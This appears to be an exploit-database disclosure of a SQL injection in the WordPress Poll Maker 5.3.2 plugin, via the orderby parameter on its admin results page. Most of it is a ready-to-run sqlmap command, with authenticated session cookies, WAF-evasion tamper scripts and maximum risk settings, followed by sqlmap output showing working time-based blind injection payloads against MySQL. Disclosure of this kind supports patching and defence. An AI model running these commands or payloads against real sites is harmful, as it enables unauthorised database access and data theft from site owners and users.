WordPress Poll Maker 5.3.2 SQL Injection

# Exploit Title: WordPress Poll Maker Plugin SQL Injection
# Date: 2024-07-11
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor: https://ays-pro.com/wordpress/poll-maker
# Version 5.3.2

1. **Access the Admin Panel:**
– Navigate to the admin panel of your WordPress site.
– Go to `Poll Maker > `Results` > https://localhost/wordpress/wp-admin/admin.php?page=poll-maker-ays-results&orderby=id&order=desc
“`
3. Search for orderby parameter.

## SQLMAP COMMAND

python3 sqlmap.py -u “https://localhost/wordpress/wp-admin/admin.php?page=poll-maker-ays-results&orderby=id&order=desc” –cookie=”wordpress_logged_in_55e28812cb0bc43705127d62a25df794=admin|1720624086|cQgkhpgoy0ZxhQSupSHRw7bo9mxcwEWyUp0VreNnZBK|d74e12a1cdecafc50c920c18d4711826598780dd360f3a637abcc68a6086f7a3; _wp_travel_engine_session=010869411d3c5e302ccf674d9a49d453||1720689253||1720688893; wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|81237d448295de9d99b8560e6b6d9d8640f81c4dbb629e550e56860775baf0b3; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|d8d2e1da10a83ab054e39b8dfa5787c0dc2d586f364bcb584983b26efb857285; wordpress_test_cookie=WP Cookie check; wp-settings-1=editor=html; wp-settings-time-1=1720687513″ –batch –dbms=mysql –threads=10 –no-cast –random-agent -v 3 –tamper=”between,randomcase,space2comment” –level=5 –risk=3

## RESULT

Parameter: orderby (GET)
Type: time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) – PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: page=poll-maker-ays-results&orderby=id PROCEDURE ANALYSE(EXTRACTVALUE(3054,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x58655778))))),1)# wcUc&order=desc
Vector: PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT(‘\’,(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5(‘[RANDSTR]’)),[RANDNUM])))),1)
—

—
[08:03:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:03:59] [INFO] the back-end DBMS is MySQL
[08:03:59] [PAYLOAD] id/**/PrOCEdUrE/**/analySE(exTRActvALuE(6707,CoNcAT(0x5c,(iF((VeRSION()/**/LikE/**/0x254d61726961444225),BenChmaRk(5000000,MD5(0x6e454541)),6707)))),1)#/**/ZrRh
[08:03:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option ‘–time-sec’)? [Y/n] Y
[08:04:01] [DEBUG] used the default behavior, running in batch mode
web application technology: Apache 2.4.54, PHP 8.0.23
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)